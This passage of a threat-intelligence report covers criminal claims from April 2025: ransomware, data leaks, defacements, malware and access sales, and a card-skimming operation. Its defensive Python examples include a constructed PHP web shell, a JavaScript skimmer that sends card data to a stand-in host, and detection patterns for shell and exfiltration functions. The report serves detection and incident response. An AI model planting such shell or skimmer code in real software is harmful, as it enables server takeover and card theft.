  • Details: Claimed consecutively around 2025-04-21T07:22Z. Category: Data Breach. Network: Telegram. The group “Cyber shade unit” posted claims on the same Telegram channel (“hadow_Hunter”) alleging successful attacks against these three diverse organizations. For each victim, the group claims to have taken control over their infrastructure, gained full access to internal systems, extracted sensitive databases and files, and temporarily disabled some services during the intrusion.
  • Threat Actor Profile: Cyber shade unit
  • Background: This appears to be a previously unknown or low-profile group operating via Telegram channels associated with hacking activities. The name “Cyber shade unit” implies a focus on disruptive or potentially covert cyber operations. The coordinated claims against three distinct targets in different countries (UAE, Ukraine, India) and sectors within a very short timeframe suggest either a targeted campaign or a spree of opportunistic attacks. Their motivations are unclear but could include hacktivism (political or social protest), disruption for notoriety, or potentially financial gain if the stolen data is intended for sale or extortion, although the claims focus more on control and disruption.
  • TTPs: The group’s claims of achieving “full access to internal systems,” extracting “sensitive databases and files,” and “temporarily disabling services” suggest TTPs beyond simple website defacement or DDoS attacks commonly associated with lower-tier hacktivism. If accurate, their methods likely involve exploiting significant vulnerabilities in web applications, servers, or network infrastructure, potentially using stolen credentials, or exploiting misconfigurations to gain deep network access. Data exfiltration and disruptive actions (disabling services) are explicitly claimed. Communication and boasting occur via Telegram.
  • Targets & Motivations: The wide diversity of targets (Marketing in UAE, Education in Ukraine, Manufacturing in India) makes deducing a clear motivation difficult without further information about the group. Targeting a school in Ukraine could suggest a pro-Russian alignment, common among many hacktivist groups active since 2022 [45]. However, the targeting of entities in the UAE and India does not neatly fit this narrative. The motivation could be complex geopolitical maneuvering, anti-establishment sentiment directed at diverse targets, purely opportunistic attacks based on vulnerability scanning, or potentially exaggerated claims made to gain credibility or attention within the hacktivist community. The emphasis on control and disruption leans more towards hacktivism than straightforward financial crime. The simultaneous nature of these claims against disparate victims is unusual and warrants further monitoring to ascertain the group’s true capabilities, affiliations, and objectives. The claim of deep system access, if verified, would indicate a more sophisticated actor than typical defacement groups.
  • Evidence:
    • Published URL: https://t.me/hadow_Hunter/1640 (Same URL applies to all three incidents)
    • Screenshots:
      • Brandwave: https://d34iuop8pidsy8.cloudfront.net/66c98137-c46f-42c2-8cb6-b20bce3cf16f.png, https://d34iuop8pidsy8.cloudfront.net/b7444001-1223-4cef-a865-8aef94731169.png
      • School 155: https://d34iuop8pidsy8.cloudfront.net/2df7d832-6435-423c-bfa4-a76b799e1f18.png, https://d34iuop8pidsy8.cloudfront.net/e2705825-ed30-4467-9f61-b8cb5226d873.png
      • Proficient Industries: https://d34iuop8pidsy8.cloudfront.net/b40dd782-0a5d-4207-bbac-e8f6fad79d15.png, https://d34iuop8pidsy8.cloudfront.net/475fe35f-26ec-4aca-87e7-bef71ac23278.png

Incident 12: Alleged sale of access to compromised French PrestaShop site

  • Victim: Unspecified PrestaShop e-commerce site (E-commerce & Online Stores, France)
  • Details: Claimed on 2025-04-21T06:38:41Z. Category: Initial Access. Network: Openweb (exploit.in forum). The threat actor “Clawson” is offering for sale access to a compromised e-commerce website based in France. The site reportedly uses the PrestaShop platform and receives over 175,000 monthly visits. The offered access includes a web shell with capabilities to modify PHP and JavaScript files, although the seller notes some potential issues with PHP execution, possibly due to caching or plugin conflicts. Crucially, the actor claims that malicious card redirects implemented on the shop generate approximately 950 stolen credit cards per month.
  • Threat Actor Profile: Clawson
  • Background: “Clawson” is active on exploit.in, a prominent Russian-speaking underground forum often used for trading illicit goods and services. This actor appears to operate as an Initial Access Broker (IAB) with a specialization in compromising e-commerce websites. Their motivation is financial gain through the sale of access and potentially the proceeds from the active card skimming operation. Available research snippets related to “Clawson” or PrestaShop compromises were either irrelevant spam/filler content 47 or general discussions of e-commerce security issues.52
  • TTPs: The actor likely gains access by exploiting vulnerabilities specific to the PrestaShop platform itself or, more commonly, vulnerabilities within third-party modules or plugins installed on the target site. Once server access is achieved, they install a web shell (a script allowing remote command execution via a web browser) to maintain control and facilitate file modification. They have implemented malicious scripts, likely JavaScript injected into the site’s frontend, to intercept or redirect customer payment card details during the checkout process (a technique known as web skimming or Magecart-style attacks). The final step involves advertising and selling this compromised access, including the active carding operation, on cybercrime forums.
  • Targets & Motivations: The motivation is strictly financial. Targets are e-commerce websites, particularly those built on popular platforms like PrestaShop, which have a large user base and potentially numerous vulnerable plugins. High-traffic sites (like the one claimed with 175K+ monthly visits) are particularly attractive as they offer a larger pool of potential victims for card theft. The focus on a French site might indicate a regional preference, access obtained via specific localized campaigns, or simply an opportunistic find. The sale includes not just access but an ongoing, profitable card skimming operation (generating ~950 cards/month), making it significantly more valuable to potential buyers seeking immediate illicit revenue streams. The mention of PHP execution issues might suggest the skimming is primarily client-side (JavaScript) or that server-side defenses are partially effective, limiting full backend control but not stopping the card theft.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257780/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/99fef434-51e5-4d18-a9b2-8614aacb0259.png
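
The two artefacts the seller describes, a PHP web shell and a client-side card skimmer, are exactly what a shop owner can look for without the seller's cooperation: diff the document root against a known-good deployment, then inspect every changed PHP or JavaScript file for shell and skimmer traits and for outbound hosts the checkout should never contact. The script below is an added example written for this report, not code from the listing, from PrestaShop or from any vendor; the file contents, the allowed-host list and the indicator patterns are constructed assumptions for illustration.

```python
"""Triage of a compromised PHP storefront: file-integrity diff plus a
heuristic scan of changed PHP/JS files for web-shell and skimmer traits.
All file contents below are constructed for this example."""
import hashlib
import re

# Hosts the shop legitimately talks to from the browser (assumption for this example).
ALLOWED_HOSTS = {"shop.example", "payments.example"}

# Constructed "known good" snapshot, e.g. taken from the clean deployment artefact.
BASELINE = {
    "themes/classic/assets/js/checkout.js":
        "document.getElementById('pay').addEventListener('click', function(){ go(); });",
    "modules/ps_cache/helper.php":
        "<?php function cache_key($k) { return md5($k); }",
    "index.php": "<?php require 'config/config.inc.php';",
}

# Constructed "current" snapshot as pulled from the live server: one module file
# gained a web shell, and a skimmer was dropped in as a new minified script.
CURRENT = dict(BASELINE)
CURRENT["modules/ps_cache/helper.php"] = (
    "<?php function cache_key($k) { return md5($k); }\n"
    "if (isset($_POST['c'])) { eval(base64_decode($_POST['c'])); }"
)
CURRENT["themes/classic/assets/js/cart.min.js"] = (
    "(function(){document.addEventListener('submit',function(e){var f=e.target;"
    "var d=btoa(f.cardnumber.value+'|'+f.cvv.value+'|'+f.expiry.value);"
    "new Image().src='https://stat-cdn.example/g.gif?d='+d;});})();"
)

WEBSHELL_PATTERNS = [
    (r"\b(eval|assert|system|shell_exec|passthru|popen|proc_open)\s*\(", "executes attacker-supplied code"),
    (r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", "reads request parameters"),
    (r"\b(base64_decode|gzinflate|str_rot13)\s*\(", "decodes an obfuscated payload"),
]
SKIMMER_PATTERNS = [
    (r"\b(cardnumber|card_number|ccnumber|cvv|cvc|expir)", "references payment card fields"),
    (r"addEventListener\(\s*['\"](submit|click|keyup)['\"]", "hooks form input or submission"),
    (r"\b(btoa|atob|String\.fromCharCode|unescape)\s*\(", "encodes or obfuscates data"),
    (r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b", "has a client-side exfiltration primitive"),
]
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def sha256(text):
    return hashlib.sha256(text.encode()).hexdigest()


def changed_files(baseline, current):
    """Paths that were added, removed, or whose content hash differs."""
    out = set()
    for path in set(baseline) | set(current):
        if path not in baseline or path not in current:
            out.add(path)
        elif sha256(baseline[path]) != sha256(current[path]):
            out.add(path)
    return out


def scan_file(path, content, allowed_hosts=ALLOWED_HOSTS):
    """Human-readable findings for one file; an empty list means nothing matched."""
    patterns = WEBSHELL_PATTERNS if path.endswith(".php") else SKIMMER_PATTERNS
    findings = [why for rx, why in patterns if re.search(rx, content, re.I)]
    for host in HOST_RE.findall(content):
        if host.lower() not in allowed_hosts:
            findings.append(f"contacts unexpected host {host}")
    return findings


def triage(baseline, current, allowed_hosts=ALLOWED_HOSTS, min_hits=2):
    """Map each changed file to its findings, keeping files with at least
    min_hits indicators; a single hit (one fetch() call) is usually benign."""
    report = {}
    for path in sorted(changed_files(baseline, current)):
        if path not in current:
            report[path] = ["file removed"]
            continue
        hits = scan_file(path, current[path], allowed_hosts)
        if len(hits) >= min_hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in triage(BASELINE, CURRENT).items():
        print(path)
        for h in hits:
            print("   -", h)
```

The hash diff is what catches the modified module file; the pattern scan only decides which changed files deserve a human look first. On a real deployment the baseline comes from the release package or version control, not from the live server, because a shell installed before the baseline was taken would otherwise be whitelisted.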

Incidents 13, 17, 21: Anonymous Italia targets body-feeling.ru, biteyko.ru, bestalp.ru

  • Victims:
  • body-feeling.ru (Health & Fitness, Russia)
  • biteyko.ru (Software Development, Russia)
  • bestalp.ru (Building and construction, Russia)
  • Details: Claimed between 2025-04-21T00:22Z and 2025-04-21T05:39Z. Category: Defacement. Network: Telegram. The hacktivist group “Anonymous Italia” claimed responsibility for defacing the websites of these three Russian businesses via posts on their Telegram operations channel.
  • Threat Actor Profile: Anonymous Italia
  • Background: Anonymous Italia is identified as a regional faction or collective operating under the umbrella of the global Anonymous movement.46 The broader Anonymous collective is a decentralized, international hacktivist group active since approximately 2003, known for cyberattacks targeting governments, corporations, and other organizations to protest censorship, perceived injustices, or specific political events.53 Anonymous Italia specifically has been documented as being active in conducting cyber operations, primarily DDoS attacks and defacements, against Russian entities following the full-scale invasion of Ukraine in 2022, aligning with the wider Anonymous collective’s anti-invasion stance.45
  • TTPs: The primary TTPs associated with Anonymous Italia and similar hacktivist groups include Distributed Denial-of-Service (DDoS) attacks aimed at overwhelming target websites or services, and website defacements, which involve altering a website’s content to display the group’s message or propaganda.45 Defacements are typically achieved through common web weaknesses: SQL injection, unrestricted file upload, exposed administrative interfaces with weak or default credentials, or known flaws in Content Management Systems (CMS) or web server software (cross-site scripting on its own usually affects individual visitors rather than the stored page content, so it is a less common route to a persistent defacement). They heavily utilize platforms like Telegram for coordination, recruitment, and publicizing their attacks.45
  • Targets & Motivations: The group’s actions are driven by political motivations, specifically hacktivism. Their attacks against Russian websites serve as a form of digital protest against the ongoing war in Ukraine.45 Targets are often chosen opportunistically or symbolically to maximize visibility and express dissent against the Russian state or perceived supporters.57 The targeting of seemingly random Russian commercial websites (in sectors like health/fitness, software development, and construction) reinforces the idea that the protest is directed broadly against Russia, rather than being focused on specific military or government entities. This activity demonstrates the continued use of relatively low-sophistication cyberattacks as a tool for geopolitical protest by decentralized groups. While often causing only temporary disruption or reputational damage, these actions contribute to the overall cyber conflict landscape. The existence of distinct regional cells like Anonymous Italia highlights how localized groups can participate in global hacktivist campaigns.45
  • Evidence:
  • body-feeling.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/726
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/cd7123f6-9abd-43e2-908d-88807171659d.png
  • biteyko.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/722
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/e785d693-c3f8-4956-b401-dab7b06adbc7.png
  • bestalp.ru:
  • Published URL: https://t.me/AnonSecIta_Ops/718
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bfbae3bd-a70e-4a16-b499-730831fa2fea.png

Incident 14: Alleged Sale of Baldwin Killer

  • Victim: N/A (Malware Sale)
  • Details: Claimed on 2025-04-21T04:38:44Z. Category: Malware. Network: Openweb (xss.is forum). An actor using the handle “Baldwin” is advertising a malware tool named “Baldwin Killer” for sale on the xss.is forum. The tool is marketed with advanced capabilities designed to bypass endpoint security solutions and maintain stealth on compromised Windows systems. Claimed features include bypassing major antivirus (AV) and Endpoint Detection and Response (EDR) products (Windows Defender, Kaspersky, Bitdefender, Avast mentioned), memory injection techniques, User Account Control (UAC) bypass using a custom “undetectable” method, a Ring0 rootkit for deep system stealth, auto-startup functionality triggered at early boot stages, and SmartScreen bypass via DLL sideloading.
  • Threat Actor Profile: Baldwin
  • Background: “Baldwin” appears to be a malware developer and vendor operating within the cybercrime underground, specifically on the xss.is forum. Their motivation is financial, profiting from the sale of malicious software to other threat actors. The sophisticated features claimed for “Baldwin Killer” suggest a focus on creating tools that enable stealthy and persistent compromise of modern Windows environments. No further specific information on this actor was found in the provided research.
  • TTPs: The primary TTP is malware development, incorporating advanced defense evasion and persistence techniques. This includes coding capabilities for memory injection, developing or integrating UAC bypass techniques (on current Windows builds these are usually abuses of auto-elevating system binaries rather than exploits), implementing Ring0 rootkit functionality (which requires kernel-level programming expertise and, on 64-bit Windows, a way past Driver Signature Enforcement, typically a stolen or leaked code-signing certificate or a vulnerable signed driver), manipulating boot processes for early startup, and leveraging DLL sideloading against trusted applications to bypass security mechanisms like SmartScreen. Marketing and selling the developed malware on underground forums is the distribution method. Providing ongoing updates or support might also be part of the offering to maintain the tool’s effectiveness against evolving defenses. The feature list is the seller’s own claim; an analyst would expect to see the bypasses demonstrated against current product versions before treating any of it as verified.
  • Targets & Motivations: The actor’s motivation is financial profit from selling the malware. The tool itself is designed to be used by other cybercriminals targeting Windows systems. Buyers would likely use “Baldwin Killer” as a payload dropper or loader for other malware (like infostealers, banking trojans, or ransomware), or as a standalone tool for establishing persistent, hidden access for espionage or data theft. The claimed features, particularly the Ring0 rootkit, early boot persistence, and broad EDR bypass, represent significant capabilities that are highly sought after by attackers aiming to defeat modern security stacks. The availability of such tools for purchase lowers the barrier for less sophisticated actors to conduct advanced attacks, contributing to the overall threat level. This commoditization of advanced malware is a key factor in the cybersecurity arms race.
  • Evidence:
  • Published URL: https://xss.is/threads/136470/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/50f7f600-a462-4cc3-98c2-3023126ccaf9.png
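
Of the claimed features, DLL sideloading is the one defenders can look for with ordinary endpoint telemetry: a signed, trusted executable is started from a user-writable folder and loads a DLL that carries the name of a Windows system library but sits next to the executable instead of in System32. The example below, added for this report and not derived from the listing or from any product, applies that heuristic to records shaped like Sysmon Event ID 7 (image load) fields. The list of impersonated DLL names, the paths and the signer strings are constructed assumptions.

```python
"""Heuristic for the DLL sideloading claimed in the listing: a process loads
a DLL whose file name matches a Windows system DLL from somewhere other than
the system directories, typically the executable's own folder. Records are
constructed in the shape of Sysmon Event ID 7 fields; none are real telemetry."""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# System DLL names frequently impersonated by sideloaded payloads (assumed list for this example).
IMPERSONATED_DLLS = {
    "version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll",
    "userenv.dll", "profapi.dll", "dwmapi.dll", "uxtheme.dll", "msimg32.dll",
}

SAMPLE_EVENTS = [
    # Unsigned version.dll dropped next to an updater in a user-writable temp directory.
    {"Image": r"C:\Users\alice\AppData\Local\Temp\upd\vendor-updater.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\upd\version.dll",
     "Signed": "false", "Signature": ""},
    # Normal load of the genuine DLL from System32.
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    # Microsoft-signed redistributable shipped with a debugger: expected, not a sideload.
    {"Image": r"C:\Program Files\Debugger\windbg.exe",
     "ImageLoaded": r"C:\Program Files\Debugger\dbghelp.dll",
     "Signed": "true", "Signature": "Microsoft Corporation"},
    # Signed by a third party but named after a Windows DLL and loaded from ProgramData.
    {"Image": r"C:\ProgramData\Sync\sync.exe",
     "ImageLoaded": r"C:\ProgramData\Sync\cryptbase.dll",
     "Signed": "true", "Signature": "Example Software Ltd"},
    # Ordinary application DLL: name is not on the impersonation list, so it is ignored.
    {"Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\vendorcore.dll",
     "Signed": "true", "Signature": "Vendor Inc"},
]


def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def sideload_reason(event):
    """Return why the load looks like sideloading, or None if it does not."""
    loaded = event["ImageLoaded"]
    name = ntpath.basename(loaded).lower()
    if name not in IMPERSONATED_DLLS or _in_system_dir(loaded):
        return None
    signed = event.get("Signed", "").lower() == "true"
    signer = event.get("Signature", "")
    if signed and signer.startswith("Microsoft"):
        return None  # Microsoft redistributable next to the application: normal
    same_dir = ntpath.dirname(loaded).lower() == ntpath.dirname(event["Image"]).lower()
    where = "from the host process's own directory" if same_dir else "outside the system directories"
    if not signed:
        return f"unsigned {name} loaded {where}"
    return f"{name} loaded {where}, signed by '{signer}' instead of Microsoft"


def find_sideloads(events):
    """List of (process, dll, reason) for every suspicious load."""
    out = []
    for e in events:
        reason = sideload_reason(e)
        if reason:
            out.append((e["Image"], e["ImageLoaded"], reason))
    return out


if __name__ == "__main__":
    for proc, dll, why in find_sideloads(SAMPLE_EVENTS):
        print(f"{proc}\n   loaded {dll}\n   {why}")
```

The Microsoft-signer exception matters in practice: many legitimate applications ship their own copy of dbghelp.dll or msvcr*.dll, and without it the rule drowns in false positives. Conversely, a DLL that is signed but by the wrong party is still reported, since a valid signature from an unrelated publisher is exactly what a stolen certificate buys an attacker.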

Incident 15: Alleged data breach of Bank EmiratesNBD

  • Victim: EmiratesNBD (Banking & Mortgage, UAE) – emiratesnbd.com
  • Details: Claimed on 2025-04-21T04:17:02Z. Category: Data Breach. Network: Openweb (xss.is forum). The threat actor “Machine1337” claims to have breached EmiratesNBD, a major bank in the UAE. The actor is offering data allegedly sourced from the bank, described as containing “real time updates” and including fields like name, country, phone number, and address.
  • Threat Actor Profile: Machine1337
  • Background: This is the same actor identified in Incident 4, claiming to sell data from IndiGo airlines. Active on the xss.is forum, potentially with a background in bug bounty hunting 13, suggesting technical skills now applied maliciously for financial gain.
  • TTPs: Likely involves exploiting vulnerabilities in the bank’s web applications, customer portals, APIs, or backend databases. Techniques could range from SQL injection to exploiting insecure APIs or using stolen credentials. Data exfiltration is the primary action, followed by advertising the stolen data for sale on underground forums. The claim of “real time updates” is notable and requires careful consideration. It could imply persistent access to a system generating live data (e.g., via a compromised API, access to streaming transaction logs, or persistent malware on a relevant server), or it could simply be exaggerated marketing language used by the seller to increase the perceived value of the data.
  • Targets & Motivations: The motivation is clearly financial. Targeting a large, prominent bank like EmiratesNBD indicates an aim to acquire high-value customer financial data. This incident, combined with the actor’s claim against IndiGo (India), may suggest a focus on large enterprises in the Middle East/South Asia region, or simply opportunistic targeting of valuable data troves. The “real time updates” claim, if genuine, suggests a more severe and ongoing compromise than a typical static database dump, potentially allowing continuous monitoring or harvesting of customer information and posing a much greater risk. Verification of this claim is critical for the affected institution.
  • Evidence:
  • Published URL: https://xss.is/threads/136468/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/deb82234-4409-4662-865b-6da3c4ff9c06.png

Incident 16: Alleged Data Breach of Equipment Rental Platform

  • Victim: Equipment Rental Platform (Business Supplies & Equipment, Brazil) – plataformalocadora.com.br
  • Details: Claimed on 2025-04-21T02:12:05Z. Category: Data Breach. Network: Telegram. The group “Vortex” claims to have breached the data of this Brazilian equipment rental platform. The claim posted on their Telegram channel is vague, simply stating they breached the “organization’s data” without specifying the type or volume.
  • Threat Actor Profile: Vortex
  • Background: This is the same group identified in Incident 3, which claimed a breach of Finkel Technologies (Israel). Vortex appears to be a data breach and extortion group operating via Telegram. Their motivation is likely financial gain from selling stolen data or extorting victims. No specific profile information is available from the provided research beyond their observed activities.
  • TTPs: Similar to the Finkel Technologies incident, Vortex likely compromises victims by exploiting vulnerabilities in web applications, APIs, or cloud infrastructure, or potentially through credential theft or misconfigurations. Their primary TTP involves accessing and exfiltrating organizational data, followed by announcing the breach on their Telegram channel.
  • Targets & Motivations: Likely financially motivated. Targeting a Brazilian equipment rental platform suggests opportunistic attacks, possibly driven by vulnerability scanning identifying weaknesses in the target’s systems. This second claim by Vortex within the same 24-hour period, targeting a different sector (Business Supplies vs. IT Services) and region (Brazil vs. Israel), indicates the group is actively pursuing multiple targets concurrently. The lack of specific detail in this claim compared to the Finkel Tech claim (which listed specific credentials) might suggest the data obtained is less sensitive, or the group has not yet fully analyzed it. Nonetheless, it confirms Vortex as an active threat actor conducting breaches across diverse geographical and industrial domains.
  • Evidence:
  • Published URL: https://t.me/Vvorttexx/20
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/68786db9-a31b-405a-9dd5-8ee341e8c829.png

Incident 18: Ardon Sologne falls victim to NightSpire Ransomware

  • Victim: Municipality of Ardon (Government Administration, France) – ardon45.fr
  • Details: Claimed on 2025-04-21T01:44:22Z. Category: Ransomware. Network: Tor. The NightSpire ransomware group has claimed an attack against the Municipality of Ardon in France. They state they have obtained 30 GB of the organization’s data and intend to publish it within 8-9 days if their demands are not met.
  • Threat Actor Profile: NightSpire
  • Background: NightSpire is a new ransomware and extortion operation that emerged in early March 2025.58 The name may reference World of Warcraft lore. Initial assessments suggest the operators might be relatively inexperienced or less sophisticated compared to established ransomware groups.58 The group appears to target victims opportunistically across all sectors. While initially potentially focusing only on data extortion, recent activity suggests a shift towards a traditional double extortion model involving data encryption as well.58 Despite being new, the group has shown activity, accounting for approximately 4% of observed ransomware incidents in one weekly report from late March 2025.59
  • TTPs: NightSpire employs double extortion tactics, exfiltrating data before potentially encrypting systems.58 Initial access methods are not definitively detailed for NightSpire specifically, but common vectors for such groups include exploiting known vulnerabilities in internet-facing systems like VPNs or firewalls (e.g., Fortinet, SonicWall vulnerabilities are often targeted by various groups 58), or compromising Remote Desktop Protocol (RDP) access. For data exfiltration, NightSpire has been observed using legitimate file transfer tools like WinSCP and MEGACmd.58 They also leverage “living off the land binaries” (LOLBins) – legitimate system tools misused for malicious purposes – to aid in defense evasion.58 The group has demonstrated aggressive pressure tactics, including imposing very short payment deadlines (as little as two days in some cases) and potentially publishing excerpts of negotiation chats if victims fail to comply.58
  • Targets & Motivations: The group is financially motivated.58 They appear to target organizations opportunistically, with victims observed across multiple industries, although manufacturing has been a frequent target (36% in one analysis).58 Thus far, the majority of their victims (73%) have been small to medium-sized businesses (SMBs) or organizations with fewer than 1,000 employees.58 Targeting a French municipality fits this pattern of opportunistic attacks, likely exploiting an identified vulnerability or weakness. The emergence and activity level of NightSpire illustrate the dynamic ransomware ecosystem where new groups continually surface. While potentially less sophisticated operationally 58, their ability to successfully exfiltrate data and extort victims poses a genuine threat, particularly to SMBs and local government entities which may have fewer security resources. Their potentially unpredictable behavior adds complexity to incident response and negotiation.58
  • Evidence:
  • Published URL: http://nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd.onion/datas.php
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/cefaa9f6-1ef2-4501-bdc8-9bb1ff08dba2.png

Incident 19: Michelson Realty Company LLC falls victim to Qilin Ransomware

  • Victim: Michelson Realty Company LLC (Real Estate, USA) – michelsonrealty.com
  • Details: Claimed on 2025-04-21T01:23:49Z. Category: Ransomware. Network: Tor. The Qilin ransomware group claims to have compromised Michelson Realty Company LLC, a US-based real estate firm. As is typical for the group, they claim data exfiltration and provide sample screenshots on their leak site as proof.
  • Threat Actor Profile: Qilin (aka Agenda)
  • Background & TTPs: (Refer to Incident 1 for full profile). Qilin is a likely Russian-origin RaaS group operating since July 2022, known for double extortion, high ransom demands, and using customizable Go and Rust ransomware variants.1 They gain access via phishing, exploiting external services (Fortinet VPNs) or public applications (Veeam), utilize various tools (RMM, Cobalt Strike, PsExec) and techniques (process injection, credential theft) for intrusion, persistence, lateral movement, and impact.1
  • Targets & Motivations: Qilin is financially motivated and targets organizations opportunistically across diverse global sectors.4 While real estate is not listed as a primary target sector for Qilin in some analyses 4, their opportunistic approach means any vulnerable organization with perceived ability to pay can become a victim. This attack on a US real estate company, following the earlier attack on Canadian financial services (Incident 1) within the same 24-hour period, strongly reinforces Qilin’s broad operational tempo and non-sector-specific, opportunistic targeting strategy.4 It demonstrates their capability to execute attacks across different industries and geographical regions concurrently.
  • Evidence:
  • Published URL: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=1ca89951-6a0b-3bb2-a311-0fffa85f3f81
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/31a36824-f4d3-4a18-9fa1-64f159b5f104.png

Incident 20: Alleged Data Leak of Fujita Health University

  • Victim: Fujita Health University (Hospital & Health Care, Japan) – fujita-hu.ac.jp
  • Details: Claimed on 2025-04-21T00:47:30Z. Category: Data Breach. Network: Openweb (darkforums.st). An actor using the handle “l33tfg” posted on the “darkforums.st” forum claiming to have breached Fujita Health University in Japan. The actor alleges leaking a database containing sensitive personal and institutional information, specifically mentioning university email addresses, both plaintext and hashed passwords, physical addresses, and additional data encoded in Base64 format.
  • Threat Actor Profile: l33tfg
  • Background: “l33tfg” is an actor distributing leaked data on a dark web forum. The alias is typical of hacker culture. Their motivation is likely financial (selling the data or access derived from it) or driven by a desire for notoriety within the underground community. No specific information about this actor is available in the provided research.
  • TTPs: The breach likely resulted from exploiting vulnerabilities in the university’s web applications, databases (e.g., via SQL injection), or potentially through the use of stolen credentials targeting administrative or database accounts. The actor accessed and dumped database contents containing sensitive user and institutional data. The final step involved leaking this data on a dark web forum, making it accessible to other malicious actors. If the plaintext passwords were genuinely stored that way, their presence points to significantly poor security hygiene within the compromised systems, such as inadequate password storage policies or the use of legacy systems without proper security controls. Plaintext values in a dump can also be hashes the actor has already cracked, or credentials harvested by other means (for example, infostealer logs) and merged into the listing, so responders should establish how the values were stored before drawing conclusions about the university’s practices.
  • Targets & Motivations: Likely motivated by financial gain or notoriety. Targeting a Japanese health university provides access to a wealth of potentially sensitive data, including Personally Identifiable Information (PII) of students, faculty, and possibly patients, as well as potentially valuable research data. The healthcare and education sectors are frequent targets for cyberattacks due to the value of their data and sometimes lagging security investments.3 The leak of such data, especially plaintext passwords, poses severe risks including identity theft, targeted phishing, financial fraud, and significant reputational damage to the university. It highlights the critical importance of robust security measures, particularly strong password hashing, vulnerability management, and strict access controls, in sectors handling sensitive information.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-fujita-hu-ac-jp-DATA-LEAK
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/0fef252d-892b-4282-a46a-9fa47f620aef.png
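
When a dump of this shape (emails, mixed plaintext and hashed passwords, Base64 fields) lands on a responder’s desk, the first job is to scope it: which accounts are exposed immediately, which only after cracking, and what the encoded fields actually contain. The second is to state what the storage should have looked like. The example below was written for this report and is not derived from the leaked data or from the university’s systems; the rows, the e-mail domain and the Base64 contents are constructed, and the classification of bare hex as an unsalted fast hash is a heuristic, since a salted fast hash written as hex looks identical.

```python
"""Triage of a credential dump of the kind described above, followed by
the salted, iterated hashing the store should have used. Rows are
constructed, not data from any real leak."""
import base64
import binascii
import hashlib
import hmac
import os
import re

# Constructed sample rows: e-mail, password field exactly as found, extra base64 field.
ROWS = [
    {"email": "a.tanaka@example.ac.jp", "password": "Spring2024!",
     "extra": "U2hpbmp1a3UgMS0xLTE="},
    {"email": "b.sato@example.ac.jp", "password": "5f4dcc3b5aa765d61d8327deb882cf99",
     "extra": "VG9reW8gMTIzLTQ1Njc="},
    {"email": "c.ito@example.ac.jp",
     "password": "$2b$12$R9h/cIPz0gi.URNNX3kh2OPST9/PgBkqquzi.Ss7KIUgO2t0jWMUW",
     "extra": "not base64!"},
]

HEX_RE = re.compile(r"^[0-9a-f]+$", re.I)
FAST_HASH_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def classify(value):
    """(storage type, exposure) for one password field."""
    if value.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt", "low"
    if value.startswith("$argon2"):
        return "argon2", "low"
    if value.startswith("pbkdf2_sha256$"):
        return "pbkdf2", "low"
    if value.startswith(("$5$", "$6$")):
        return "sha-crypt", "low"
    if HEX_RE.match(value) and len(value) in FAST_HASH_LEN:
        # Heuristic: a bare digest of a standard length, crackable offline at high speed.
        return FAST_HASH_LEN[len(value)] + " (unsalted, fast)", "high"
    return "plaintext", "critical"


def decode_b64_field(value):
    """Strict base64 decode; None when the field is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def summarise(rows):
    """Counts per storage type plus the accounts exposed without any cracking."""
    counts, exposed = {}, []
    for r in rows:
        kind, risk = classify(r["password"])
        counts[kind] = counts.get(kind, 0) + 1
        if risk == "critical":
            exposed.append(r["email"])
    return counts, exposed


# What the store should have held: per-user salt, iterated PBKDF2-HMAC-SHA256
# (600,000 iterations is OWASP's current floor for this construction).
ITERATIONS = 600_000


def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def verify_password(password, stored):
    _, iters, salt_b64, digest_b64 = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), base64.b64decode(salt_b64), int(iters))
    return hmac.compare_digest(digest, base64.b64decode(digest_b64))  # constant-time compare


if __name__ == "__main__":
    counts, exposed = summarise(ROWS)
    print("storage types:", counts)
    print("exposed now:", exposed)
    for r in ROWS:
        print(r["email"], "extra ->", decode_b64_field(r["extra"]))
    stored = hash_password("Spring2024!")
    print("verify:", verify_password("Spring2024!", stored), verify_password("wrong", stored))
```

The summary is what goes into the notification decision: plaintext accounts need a forced reset immediately, unsalted fast hashes within hours (a GPU cracks most of them in that time), and properly hashed ones on the normal schedule. Decoding the Base64 fields strictly (`validate=True`) avoids the common mistake of silently accepting junk and misreading it as data.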

Incident 22: Alleged Sale of Mega Account Checker Tool

  • Victim: N/A (Malware/Tool Sale)
